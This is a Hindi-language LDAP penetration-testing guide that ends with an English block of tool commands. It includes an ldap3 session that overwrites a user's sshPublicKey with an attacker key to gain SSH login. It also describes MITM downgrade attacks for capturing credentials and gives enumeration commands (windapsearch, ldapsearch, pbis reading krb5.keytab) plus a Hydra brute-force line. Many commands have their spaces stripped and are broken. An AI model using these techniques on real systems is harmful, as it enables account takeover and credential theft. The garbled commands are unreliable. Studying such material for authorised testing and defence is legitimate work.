LDAP (Lightweight Directory Access Protocol) का उपयोग मुख्य रूप से संगठन, व्यक्ति और संसाधनों जैसे फ़ाइल और उपकरणों को नेटवर्कों, सार्वजनिक और निजी दोनों में खोजने के लिए किया जाता है। यह अपने पूर्ववर्ती, DAP की तुलना में एक छोटे कोड फुटप्रिंट वाले एक संयोजित दृष्टिकोण प्रदान करता है।
LDAP निर्देशिकाएँ कई सर्वरों पर वितरित करने की अनुमति देती हैं, प्रत्येक सर्वर में निर्देशिका का एक प्रतिलिपित और समकालिक संस्करण होता है, जिसे निर्देशिका प्रणाली एजेंट (DSA) कहा जाता है। अनुरोधों को संभालने की जिम्मेदारी पूरी तरह से LDAP सर्वर पर होती है, जो अनुरोधकर्ता को एकीकृत प्रतिक्रिया प्रदान करने के लिए आवश्यकतानुसार अन्य DSAs के साथ संवाद कर सकता है।
LDAP निर्देशिका का संगठन एक वृक्ष वर्गीकरण की तरह होता है, जो ऊपर से रूट निर्देशिका से शुरू होता है। यह देशों से नीचे शाखाएँ बनाता है, जो संगठनों में विभाजित होते हैं, और फिर विभिन्न विभागों या विभागों को प्रतिनिधित्व करने वाले संगठनिक इकाइयों तक पहुंचता है, अंततः व्यक्तिगत संसाधनों स्तर तक, जिसमें लोग और फ़ाइल और प्रिंटर जैसे साझा संसाधन शामिल हैं।
डिफ़ॉल्ट पोर्ट: 389 और 636 (ldaps)। ग्लोबल कैटलॉग (ActiveDirectory में LDAP) डिफ़ॉल्ट रूप से पोर्ट 3268 और 3269 पर उपलब्ध है।
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
LDAP डेटा इंटरचेंज फॉर्मेट
LDIF (LDAP डेटा इंटरचेंज फॉर्मेट) निर्देशिका सामग्री को रेकॉर्ड के सेट के रूप में परिभाषित करता है। यह अपडेट अनुरोधों को भी प्रतिनिधित कर सकता है (जोड़ें, संशोधित करें, हटाएं, नाम बदलें)।
पंक्तियाँ 1-3 शीर्ष स्तर डोमेन स्थानीय को परिभाषित करती हैं
पंक्तियाँ 5-8 पहले स्तर डोमेन मनीकॉर्प (moneycorp.local) को परिभाषित करती हैं
पंक्तियाँ 10-16 2 संगठनात्मक इकाइयों को परिभाषित करती हैं: डेव और सेल्स
पंक्तियाँ 18-26 डोमेन का एक ऑब्जेक्ट बनाती हैं और मान के साथ गुण निर्धारित करती हैं
डेटा लिखें
ध्यान दें कि यदि आप मान को संशोधित कर सकते हैं तो आप वास्तव में दिलचस्प क्रियाएँ कर सकते हैं। उदाहरण के लिए, कल्पना करें कि आप अपने उपयोगकर्ता या किसी भी उपयोगकर्ता की "sshPublicKey" जानकारी बदल सकते हैं। यह बहुत संभावना है कि यदि यह गुण मौजूद है, तो ssh लोगों की सार्वजनिक कुंजियाँ LDAP से पढ़ रहा है। यदि आप किसी उपयोगकर्ता की सार्वजनिक कुंजी को संशोधित कर सकते हैं तो आप उस उपयोगकर्ता के रूप में लॉगिन कर सकेंगे भले ही ssh में पासवर्ड प्रमाणीकरण सक्षम न हो।
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/>>> importldap3>>> server=ldap3.Server('x.x.x.x',port=636,use_ssl=True)>>> connection=ldap3.Connection(server,'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN','PASSWORD',auto_bind=True)>>> connection.bind()True>>> connection.extend.standard.who_am_i()u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
साफ पाठ प्रमाणीकरण चोरी
यदि LDAP SSL के बिना उपयोग किया जाता है तो आप नेटवर्क में साफ पाठ में प्रमाणों को छान सकते हैं।
इसके अलावा, आप नेटवर्क में LDAP सर्वर और ग्राहक के बीच MITM हमला कर सकते हैं। यहाँ आप एक Downgrade Attack कर सकते हैं ताकि ग्राहक साफ पाठ में प्रमाणों का उपयोग करके लॉगिन कर सके।
यदि SSL का उपयोग किया जाता है तो आप MITM को बनाने की कोशिश कर सकते हैं जैसा कि ऊपर उल्लिखित है, लेकिन एक गलत प्रमाणपत्र प्रदान करके, यदि उपयोगकर्ता इसे स्वीकार करता है, तो आप प्रमाणीकरण विधि को Downgrade कर सकते हैं और पुनः प्रमाणों को देख सकते हैं।
अनाम एक्सेस
TLS SNI चेक को उमकर करें
इस लेख के अनुसार, केवल एक arbitrary डोमेन नाम के साथ LDAP सर्वर तक पहुंचकर (जैसे कंपनी.com) उसने LDAP सेवा से संपर्क किया और एक अनाम उपयोगकर्ता के रूप में जानकारी निकाली:
LDAP अनाम बाइंडअप्रमाणित हमलावरों को डोमेन से जानकारी प्राप्त करने की अनुमति देते हैं, जैसे पूरी सूची के रूप में उपयोगकर्ताओं, समूहों, कंप्यूटर, उपयोगकर्ता खाता गुण, और डोमेन पासवर्ड नीति। यह एक पुरानी विन्यास है, और Windows सर्वर 2003 के रूप में, केवल प्रमाणित उपयोगकर्ताओं को LDAP अनुरोध प्रारंभ करने की अनुमति है।
हालांकि, व्यवस्थापकों को एक विशेष एप्लिकेशन को अनाम बाइंड करने की अनुमति देने की आवश्यकता हो सकती है और अधिक से अधिक पहुंच दी हो, इसके फलस्वरूप अप्रमाणित उपयोगकर्ताओं को सभी वस्तुओं तक पहुंच मिल सकती है।
मान्य प्रमाण
यदि आपके पास LDAP सर्वर में लॉगिन करने के लिए मान्य प्रमाण हैं, तो आप डोमेन व्यवस्थापक के बारे में सभी जानकारी को डंप कर सकते हैं:
एक बार जब आप नेमिंग संदर्भ प्राप्त कर लेते हैं, तो आप कुछ और रोमांचकारी क्वेरी बना सकते हैं। यह सरल क्वेरी आपको निर्देशिका में सभी ऑब्जेक्ट्स दिखाना चाहिए:
Windapsearch एक Python स्क्रिप्ट है जो LDAP क्वेरी का उपयोग करके Windows डोमेन से उपयोगकर्ताओं, समूह और कंप्यूटरों को जांचने के लिए उपयोगी है।
# Get computerspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--computers# Get groupspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--groups# Get userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Domain Adminspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Privileged Userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--privileged-users
ldapsearch
जांचें कि क्या आपके credentials खाली हैं या क्या आपके credentials मान्य हैं:
# CREDENTIALS NOT VALID RESPONSEsearch:2result:1Operationserrortext:000004DC:LdapErr:DSID-0C090A4C,comment:Inordertoperformthisoperationasuccessfulbindmustbecompletedontheconnection.,data0,v3839
अगर आपको कुछ मिलता है जो कहता है कि "बाइंड पूरा होना चाहिए" तो इसका मतलब है कि प्रमाणपत्र गलत है।
LDAP विश्लेषण करने के लिए, हमें उपयोगकर्ताओं की जानकारी प्राप्त करने की आवश्यकता होती है। इसके लिए हम निम्नलिखित कदमों का पालन कर सकते हैं:
उपयोगकर्ताओं की सूची प्राप्त करें: ldapsearch -x -LLL -h <LDAP_SERVER_IP> -b "dc=<DOMAIN>,dc=<COM>" "(objectClass=person)"
विस्तार से उपयोगकर्ता जानकारी प्राप्त करें: ldapsearch -x -LLL -h <LDAP_SERVER_IP> -b "dc=<DOMAIN>,dc=<COM>" "(objectClass=person)" <ATTRIBUTES_TO_RETRIEVE>
यदि आपके पास किसी पासवर्ड तक पहुंच है या नहीं, तो आप एक क्वेरी निष्पादित करने के बाद grep का उपयोग कर सकते हैं:
<ldapsearchcmd...>|grep-i-A2-B2"userpas"
pbis
आप यहाँ से pbis डाउनलोड कर सकते हैं: https://github.com/BeyondTrust/pbis-open/ और यह आम तौर पर /opt/pbis में स्थापित किया जाता है।
Pbis आपको मौलिक जानकारी आसानी से प्राप्त करने की अनुमति देता है:
#Read keytab file./klist-k/etc/krb5.keytab#Get known domains info./get-status./lsaget-status#Get basic metrics./get-metrics./lsaget-metrics#Get users./enum-users./lsaenum-users#Get groups./enum-groups./lsaenum-groups#Get all kind of objects./enum-objects./lsaenum-objects#Get groups of a user./list-groups-for-user<username>./lsalist-groups-for-user<username>#Get groups of each user./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group./enum-members--by-name"domain admins"./lsaenum-members--by-name"domain admins"#Get users of each group./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user./adtool-asearch-user--nameCN="*"--keytab=/etc/krb5.keytab-n<Username>|grep"CN"|whilereadline; doecho"$line";./adtool--keytab=/etc/krb5.keytab-n<username>-alookup-object--dn="$line"--attr"description";echo"======================"done
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f